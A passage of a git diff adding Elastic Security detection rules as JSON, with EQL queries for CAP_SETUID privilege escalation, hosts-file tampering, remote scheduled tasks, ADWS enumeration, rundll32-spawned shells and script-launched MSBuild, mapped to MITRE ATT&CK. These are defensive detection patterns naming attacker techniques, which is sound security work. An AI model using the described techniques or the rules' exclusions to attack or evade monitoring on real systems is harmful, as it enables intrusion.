https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "low", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Persistence", + "Tactic: Execution", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0003", + "name": "Persistence", + "reference": "https://attack.mitre.org/tactics/TA0003/" + }, + "technique": [ + { + "id": "T1546", + "name": "Event Triggered Execution", + "reference": "https://attack.mitre.org/techniques/T1546/", + "subtechnique": [ + { + "id": "T1546.003", + "name": "Windows Management Instrumentation Event Subscription", + "reference": "https://attack.mitre.org/techniques/T1546/003/" + } + ] + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0002", + "name": "Execution", + "reference": "https://attack.mitre.org/tactics/TA0002/" + }, + "technique": [ + { + "id": "T1047", + "name": "Windows Management Instrumentation", + "reference": "https://attack.mitre.org/techniques/T1047/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 111 + }, + "id": "9b6813a1-daf1-457e-b0e6-0bb4e55b8a4c_111", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/9b80cb26-9966-44b5-abbf-764fbdbc3586_2.json b/packages/security_detection_engine/kibana/security_rule/9b80cb26-9966-44b5-abbf-764fbdbc3586_2.json new file mode 100644 index 00000000000..897652b8b49 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/9b80cb26-9966-44b5-abbf-764fbdbc3586_2.json @@ -0,0 +1,113 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies instances where a process (granted CAP_SETUID and/or CAP_SETGID capabilities) is executed, after which the user's access is elevated to UID/GID 0 (root). In Linux, the CAP_SETUID and CAP_SETGID capabilities allow a process to change its UID and GID, respectively, providing control over user and group identity management. Attackers may leverage a misconfiguration for exploitation in order to escalate their privileges to root.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Privilege Escalation via CAP_SETUID/SETGID Capabilities", + "query": "sequence by host.id, process.entity_id with maxspan=1s\n [process where host.os.type == \"linux\" and event.type == \"start\" and event.action == \"exec\" and process.name != null and\n (process.thread.capabilities.effective : \"CAP_SET?ID\" or process.thread.capabilities.permitted : \"CAP_SET?ID\") and \n user.id != \"0\"]\n [process where host.os.type == \"linux\" and event.action == \"uid_change\" and event.type == \"change\" and \n (process.thread.capabilities.effective : \"CAP_SET?ID\" or process.thread.capabilities.permitted : \"CAP_SET?ID\")\n and user.id == \"0\"]\n", + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.id", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.entity_id", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.thread.capabilities.effective", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.thread.capabilities.permitted", + "type": "keyword" + }, + { + "ecs": true, + "name": "user.id", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "9b80cb26-9966-44b5-abbf-764fbdbc3586", + "setup": "## Setup\n\n\nThis rule requires data coming in from Elastic Defend.\n\n### Elastic Defend Integration Setup\nElastic Defend is integrated into the Elastic Agent using Fleet. Upon configuration, the integration allows the Elastic Agent to monitor events on your host and send data to the Elastic Security app.\n\n#### Prerequisite Requirements:\n- Fleet is required for Elastic Defend.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n\n#### The following steps should be executed in order to add the Elastic Defend integration on a Linux System:\n- Go to the Kibana home page and click \"Add integrations\".\n- In the query bar, search for \"Elastic Defend\" and select the integration to see more details about it.\n- Click \"Add Elastic Defend\".\n- Configure the integration name and optionally add a description.\n- Select the type of environment you want to protect, either \"Traditional Endpoints\" or \"Cloud Workloads\".\n- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. [Helper guide](https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html).\n- We suggest selecting \"Complete EDR (Endpoint Detection and Response)\" as a configuration setting, that provides \"All events; all preventions\"\n- Enter a name for the agent policy in \"New agent policy name\". If other agent policies already exist, you can click the \"Existing hosts\" tab and select an existing policy instead.\nFor more details on Elastic Agent configuration settings, refer to the [helper guide](https://www.elastic.co/guide/en/fleet/8.10/agent-policy.html).\n- Click \"Save and Continue\".\n- To complete the integration, select \"Add Elastic Agent to your hosts\" and continue to the next section to install the Elastic Agent on your hosts.\nFor more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Privilege Escalation", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0004", + "name": "Privilege Escalation", + "reference": "https://attack.mitre.org/tactics/TA0004/" + }, + "technique": [ + { + "id": "T1068", + "name": "Exploitation for Privilege Escalation", + "reference": "https://attack.mitre.org/techniques/T1068/" + }, + { + "id": "T1548", + "name": "Abuse Elevation Control Mechanism", + "reference": "https://attack.mitre.org/techniques/T1548/", + "subtechnique": [ + { + "id": "T1548.001", + "name": "Setuid and Setgid", + "reference": "https://attack.mitre.org/techniques/T1548/001/" + } + ] + } + ] + } + ], + "type": "eql", + "version": 2 + }, + "id": "9b80cb26-9966-44b5-abbf-764fbdbc3586_2", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/9c260313-c811-4ec8-ab89-8f6530e0246c_108.json b/packages/security_detection_engine/kibana/security_rule/9c260313-c811-4ec8-ab89-8f6530e0246c_108.json new file mode 100644 index 00000000000..71411de9e26 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/9c260313-c811-4ec8-ab89-8f6530e0246c_108.json @@ -0,0 +1,110 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "The hosts file on endpoints is used to control manual IP address to hostname resolutions. The hosts file is the first point of lookup for DNS hostname resolution so if adversaries can modify the endpoint hosts file, they can route traffic to malicious infrastructure. This rule detects modifications to the hosts file on Microsoft Windows, Linux (Ubuntu or RHEL) and macOS systems.", + "from": "now-9m", + "index": [ + "auditbeat-*", + "winlogbeat-*", + "logs-endpoint.events.*", + "logs-windows.*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Hosts File Modified", + "note": "## Triage and analysis\n\n### Investigating Hosts File Modified\n\nOperating systems use the hosts file to map a connection between an IP address and domain names before going to domain name servers. Attackers can abuse this mechanism to route traffic to malicious infrastructure or disrupt security that depends on server communications. For example, Russian threat actors modified this file on a domain controller to redirect Duo MFA calls to localhost instead of the Duo server, which prevented the MFA service from contacting its server to validate MFA login. This effectively disabled MFA for active domain accounts because the default policy of Duo for Windows is to \"Fail open\" if the MFA server is unreachable. This can happen in any MFA implementation and is not exclusive to Duo. Find more details in this [CISA Alert](https://www.cisa.gov/uscert/ncas/alerts/aa22-074a).\n\nThis rule identifies modifications in the hosts file across multiple operating systems using process creation events for Linux and file events in Windows and macOS.\n\n#### Possible investigation steps\n\n- Identify the specifics of the involved assets, such as role, criticality, and associated users.\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Contact the account owner and confirm whether they are aware of this activity.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Examine the changes to the hosts file by comparing it against file backups, volume shadow copies, and other restoration mechanisms.\n\n### False positive analysis\n\n- This mechanism can be used legitimately. Analysts can dismiss the alert if the administrator is aware of the activity and the configuration was justified.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Consider isolating the involved host to prevent further post-compromise behavior.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Review the privileges of the administrator account that performed the action.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "any where\n\n /* file events for creation; file change events are not captured by some of the included sources for linux and so may\n miss this, which is the purpose of the process + command line args logic below */\n (\n event.category == \"file\" and event.type in (\"change\", \"creation\") and\n file.path : (\"/private/etc/hosts\", \"/etc/hosts\", \"?:\\\\Windows\\\\System32\\\\drivers\\\\etc\\\\hosts\") and \n not process.name in (\"dockerd\", \"rootlesskit\", \"podman\", \"crio\")\n )\n or\n\n /* process events for change targeting linux only */\n (\n event.category == \"process\" and event.type in (\"start\") and\n process.name in (\"nano\", \"vim\", \"vi\", \"emacs\", \"echo\", \"sed\") and\n process.args : (\"/etc/hosts\") and \n not process.parent.name in (\"dhclient-script\", \"google_set_hostname\")\n )\n", + "references": [ + "https://www.elastic.co/guide/en/beats/auditbeat/current/auditbeat-reference-yml.html" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.path", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.name", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "9c260313-c811-4ec8-ab89-8f6530e0246c", + "setup": "## Setup\n\nFor Windows systems using Auditbeat, this rule requires adding `C:/Windows/System32/drivers/etc` as an additional path in the 'file_integrity' module of auditbeat.yml.\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Linux", + "OS: Windows", + "OS: macOS", + "Use Case: Threat Detection", + "Tactic: Impact", + "Resources: Investigation Guide", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0040", + "name": "Impact", + "reference": "https://attack.mitre.org/tactics/TA0040/" + }, + "technique": [ + { + "id": "T1565", + "name": "Data Manipulation", + "reference": "https://attack.mitre.org/techniques/T1565/", + "subtechnique": [ + { + "id": "T1565.001", + "name": "Stored Data Manipulation", + "reference": "https://attack.mitre.org/techniques/T1565/001/" + } + ] + } + ] + } + ], + "timeline_id": "4d4c0b59-ea83-483f-b8c1-8c360ee53c5c", + "timeline_title": "Comprehensive File Timeline", + "timestamp_override": "event.ingested", + "type": "eql", + "version": 108 + }, + "id": "9c260313-c811-4ec8-ab89-8f6530e0246c_108", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/9c865691-5599-447a-bac9-b3f2df5f9a9d_8.json b/packages/security_detection_engine/kibana/security_rule/9c865691-5599-447a-bac9-b3f2df5f9a9d_8.json new file mode 100644 index 00000000000..3e67232a1f0 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/9c865691-5599-447a-bac9-b3f2df5f9a9d_8.json @@ -0,0 +1,99 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies scheduled task creation from a remote source. This could be indicative of adversary lateral movement.", + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-system.security*", + "logs-windows.forwarded*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Remote Scheduled Task Creation via RPC", + "note": "## Triage and analysis\n\n### Investigating Remote Scheduled Task Creation\n\n[Scheduled tasks](https://docs.microsoft.com/en-us/windows/win32/taskschd/about-the-task-scheduler) are a great mechanism for persistence and program execution. These features can be used remotely for a variety of legitimate reasons, but at the same time used by malware and adversaries. When investigating scheduled tasks that were set up remotely, one of the first steps should be to determine the original intent behind the configuration and to verify if the activity is tied to benign behavior such as software installation or any kind of network administrator work. One objective for these alerts is to understand the configured action within the scheduled task. This is captured within the registry event data for this rule and can be base64 decoded to view the value.\n\n#### Possible investigation steps\n\n- Review the TaskContent value to investigate the task configured action.\n- Validate if the activity is not related to planned patches, updates, network administrator activity, or legitimate software installations.\n- Further examination should include review of host-based artifacts and network logs from around when the scheduled task was created, on both the source and target machines.\n\n### False positive analysis\n\n- There is a high possibility of benign activity tied to the creation of remote scheduled tasks as it is a general feature within Windows and used for legitimate purposes for a wide range of activity. Any kind of context should be found to further understand the source of the activity and determine the intent based on the scheduled task's contents.\n\n### Related rules\n\n- Service Command Lateral Movement - d61cbcf8-1bc1-4cff-85ba-e7b21c5beedc\n- Remotely Started Services via RPC - aa9a274d-6b53-424d-ac5e-cb8ca4251650\n- Remote Scheduled Task Creation - 954ee7c8-5437-49ae-b2d6-2960883898e9\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- Remove scheduled task and any other related artifacts.\n- Review privileged account management and user account management settings. Consider implementing group policy object (GPO) policies to further restrict activity, or configuring settings that only allow administrators to create remote scheduled tasks.\n", + "query": "iam where event.action == \"scheduled-task-created\" and \n winlog.event_data.RpcCallClientLocality : \"0\" and winlog.event_data.ClientProcessId : \"0\"\n", + "related_integrations": [ + { + "package": "system", + "version": "^1.6.4" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": false, + "name": "winlog.event_data.ClientProcessId", + "type": "unknown" + }, + { + "ecs": false, + "name": "winlog.event_data.RpcCallClientLocality", + "type": "unknown" + } + ], + "risk_score": 47, + "rule_id": "9c865691-5599-447a-bac9-b3f2df5f9a9d", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Lateral Movement" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0008", + "name": "Lateral Movement", + "reference": "https://attack.mitre.org/tactics/TA0008/" + }, + "technique": [ + { + "id": "T1021", + "name": "Remote Services", + "reference": "https://attack.mitre.org/techniques/T1021/" + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0002", + "name": "Execution", + "reference": "https://attack.mitre.org/tactics/TA0002/" + }, + "technique": [ + { + "id": "T1053", + "name": "Scheduled Task/Job", + "reference": "https://attack.mitre.org/techniques/T1053/", + "subtechnique": [ + { + "id": "T1053.005", + "name": "Scheduled Task", + "reference": "https://attack.mitre.org/techniques/T1053/005/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 8 + }, + "id": "9c865691-5599-447a-bac9-b3f2df5f9a9d_8", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/9c951837-7d13-4b0c-be7a-f346623c8795_1.json b/packages/security_detection_engine/kibana/security_rule/9c951837-7d13-4b0c-be7a-f346623c8795_1.json new file mode 100644 index 00000000000..dbdabb4739e --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/9c951837-7d13-4b0c-be7a-f346623c8795_1.json @@ -0,0 +1,109 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies processes loading Active Directory related modules followed by a network connection to the ADWS dedicated TCP port. Adversaries may abuse the ADWS Windows service that allows Active Directory to be queried via this web service.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Potential Enumeration via Active Directory Web Service", + "query": "sequence by process.entity_id with maxspan=3m\n [library where host.os.type == \"windows\" and \n dll.name : (\"System.DirectoryServices*.dll\", \"System.IdentityModel*.dll\") and \n not user.id in (\"S-1-5-18\", \"S-1-5-19\", \"S-1-5-20\") and \n not process.executable : \n (\"?:\\\\windows\\\\system32\\\\dsac.exe\", \n \"?:\\\\program files\\\\powershell\\\\?\\\\pwsh.exe\", \n \"?:\\\\windows\\\\system32\\\\windowspowershell\\\\*.exe\", \n \"?:\\\\windows\\\\syswow64\\\\windowspowershell\\\\*.exe\", \n \"?:\\\\program files\\\\microsoft monitoring agent\\\\*.exe\", \n \"?:\\\\windows\\\\adws\\\\microsoft.activedirectory.webservices.exe\")]\n [network where host.os.type == \"windows\" and destination.port == 9389 and source.port >= 49152 and\n network.direction == \"egress\" and network.transport == \"tcp\" and not cidrmatch(destination.ip, \"127.0.0.0/8\", \"::1/128\")]\n", + "references": [ + "https://github.com/FalconForceTeam/SOAPHound" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "destination.ip", + "type": "ip" + }, + { + "ecs": true, + "name": "destination.port", + "type": "long" + }, + { + "ecs": true, + "name": "dll.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "network.direction", + "type": "keyword" + }, + { + "ecs": true, + "name": "network.transport", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.entity_id", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.executable", + "type": "keyword" + }, + { + "ecs": true, + "name": "source.port", + "type": "long" + }, + { + "ecs": true, + "name": "user.id", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "9c951837-7d13-4b0c-be7a-f346623c8795", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Discovery", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0007", + "name": "Discovery", + "reference": "https://attack.mitre.org/tactics/TA0007/" + }, + "technique": [ + { + "id": "T1018", + "name": "Remote System Discovery", + "reference": "https://attack.mitre.org/techniques/T1018/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 1 + }, + "id": "9c951837-7d13-4b0c-be7a-f346623c8795_1", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/9ccf3ce0-0057-440a-91f5-870c6ad39093_109.json b/packages/security_detection_engine/kibana/security_rule/9ccf3ce0-0057-440a-91f5-870c6ad39093_109.json new file mode 100644 index 00000000000..77e0aabe1c1 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/9ccf3ce0-0057-440a-91f5-870c6ad39093_109.json @@ -0,0 +1,150 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies command shell activity started via RunDLL32, which is commonly abused by attackers to host malicious code.", + "false_positives": [ + "Microsoft Windows installers leveraging RunDLL32 for installation." + ], + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-endpoint.events.*", + "logs-windows.sysmon_operational-*", + "endgame-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Command Shell Activity Started via RunDLL32", + "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\n process.name : (\"cmd.exe\", \"powershell.exe\") and\n process.parent.name : \"rundll32.exe\" and process.parent.command_line != null and\n /* common FPs can be added here */\n not process.parent.args : (\"C:\\\\Windows\\\\System32\\\\SHELL32.dll,RunAsNewUser_RunDLL\",\n \"C:\\\\WINDOWS\\\\*.tmp,zzzzInvokeManagedCustomActionOutOfProc\")\n", + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.command_line", + "type": "wildcard" + }, + { + "ecs": true, + "name": "process.parent.name", + "type": "keyword" + } + ], + "risk_score": 21, + "rule_id": "9ccf3ce0-0057-440a-91f5-870c6ad39093", + "setup": "## Setup\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "low", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Execution", + "Tactic: Credential Access", + "Tactic: Defense Evasion", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend", + "Data Source: Sysmon" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0002", + "name": "Execution", + "reference": "https://attack.mitre.org/tactics/TA0002/" + }, + "technique": [ + { + "id": "T1059", + "name": "Command and Scripting Interpreter", + "reference": "https://attack.mitre.org/techniques/T1059/", + "subtechnique": [ + { + "id": "T1059.001", + "name": "PowerShell", + "reference": "https://attack.mitre.org/techniques/T1059/001/" + }, + { + "id": "T1059.003", + "name": "Windows Command Shell", + "reference": "https://attack.mitre.org/techniques/T1059/003/" + } + ] + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0006", + "name": "Credential Access", + "reference": "https://attack.mitre.org/tactics/TA0006/" + }, + "technique": [ + { + "id": "T1552", + "name": "Unsecured Credentials", + "reference": "https://attack.mitre.org/techniques/T1552/" + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1218", + "name": "System Binary Proxy Execution", + "reference": "https://attack.mitre.org/techniques/T1218/", + "subtechnique": [ + { + "id": "T1218.011", + "name": "Rundll32", + "reference": "https://attack.mitre.org/techniques/T1218/011/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 109 + }, + "id": "9ccf3ce0-0057-440a-91f5-870c6ad39093_109", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/9ccf3ce0-0057-440a-91f5-870c6ad39093_110.json b/packages/security_detection_engine/kibana/security_rule/9ccf3ce0-0057-440a-91f5-870c6ad39093_110.json new file mode 100644 index 00000000000..b55feca2506 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/9ccf3ce0-0057-440a-91f5-870c6ad39093_110.json @@ -0,0 +1,150 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies command shell activity started via RunDLL32, which is commonly abused by attackers to host malicious code.", + "false_positives": [ + "Microsoft Windows installers leveraging RunDLL32 for installation." + ], + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-endpoint.events.process-*", + "logs-windows.sysmon_operational-*", + "endgame-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Command Shell Activity Started via RunDLL32", + "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\n process.name : (\"cmd.exe\", \"powershell.exe\") and\n process.parent.name : \"rundll32.exe\" and process.parent.command_line != null and\n /* common FPs can be added here */\n not process.parent.args : (\"C:\\\\Windows\\\\System32\\\\SHELL32.dll,RunAsNewUser_RunDLL\",\n \"C:\\\\WINDOWS\\\\*.tmp,zzzzInvokeManagedCustomActionOutOfProc\")\n", + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.command_line", + "type": "wildcard" + }, + { + "ecs": true, + "name": "process.parent.name", + "type": "keyword" + } + ], + "risk_score": 21, + "rule_id": "9ccf3ce0-0057-440a-91f5-870c6ad39093", + "setup": "## Setup\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "low", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Execution", + "Tactic: Credential Access", + "Tactic: Defense Evasion", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend", + "Data Source: Sysmon" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0002", + "name": "Execution", + "reference": "https://attack.mitre.org/tactics/TA0002/" + }, + "technique": [ + { + "id": "T1059", + "name": "Command and Scripting Interpreter", + "reference": "https://attack.mitre.org/techniques/T1059/", + "subtechnique": [ + { + "id": "T1059.001", + "name": "PowerShell", + "reference": "https://attack.mitre.org/techniques/T1059/001/" + }, + { + "id": "T1059.003", + "name": "Windows Command Shell", + "reference": "https://attack.mitre.org/techniques/T1059/003/" + } + ] + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0006", + "name": "Credential Access", + "reference": "https://attack.mitre.org/tactics/TA0006/" + }, + "technique": [ + { + "id": "T1552", + "name": "Unsecured Credentials", + "reference": "https://attack.mitre.org/techniques/T1552/" + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1218", + "name": "System Binary Proxy Execution", + "reference": "https://attack.mitre.org/techniques/T1218/", + "subtechnique": [ + { + "id": "T1218.011", + "name": "Rundll32", + "reference": "https://attack.mitre.org/techniques/T1218/011/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 110 + }, + "id": "9ccf3ce0-0057-440a-91f5-870c6ad39093_110", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/9d110cb3-5f4b-4c9a-b9f5-53f0a1707ae2_208.json b/packages/security_detection_engine/kibana/security_rule/9d110cb3-5f4b-4c9a-b9f5-53f0a1707ae2_208.json new file mode 100644 index 00000000000..e35c91e4b38 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/9d110cb3-5f4b-4c9a-b9f5-53f0a1707ae2_208.json @@ -0,0 +1,142 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "An instance of MSBuild, the Microsoft Build Engine, was started by a script or the Windows command interpreter. This behavior is unusual and is sometimes used by malicious payloads.", + "false_positives": [ + "The Build Engine is commonly used by Windows developers but use by non-engineers is unusual." + ], + "from": "now-9m", + "history_window_start": "now-14d", + "index": [ + "winlogbeat-*", + "logs-endpoint.events.*", + "logs-windows.*" + ], + "language": "kuery", + "license": "Elastic License v2", + "name": "Microsoft Build Engine Started by a Script Process", + "new_terms_fields": [ + "host.id", + "user.name", + "process.command_line" + ], + "query": "host.os.type:windows and event.category:process and event.type:start and (\n process.name.caseless:\"msbuild.exe\" or process.pe.original_file_name:\"MSBuild.exe\") and \n process.parent.name:(\"cmd.exe\" or \"powershell.exe\" or \"pwsh.exe\" or \"powershell_ise.exe\" or \"cscript.exe\" or\n \"wscript.exe\" or \"mshta.exe\")\n", + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": false, + "name": "process.name.caseless", + "type": "unknown" + }, + { + "ecs": true, + "name": "process.parent.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.pe.original_file_name", + "type": "keyword" + } + ], + "risk_score": 21, + "rule_id": "9d110cb3-5f4b-4c9a-b9f5-53f0a1707ae2", + "setup": "## Setup\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "low", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Defense Evasion", + "Tactic: Execution", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1127", + "name": "Trusted Developer Utilities Proxy Execution", + "reference": "https://attack.mitre.org/techniques/T1127/", + "subtechnique": [ + { + "id": "T1127.001", + "name": "MSBuild", + "reference": 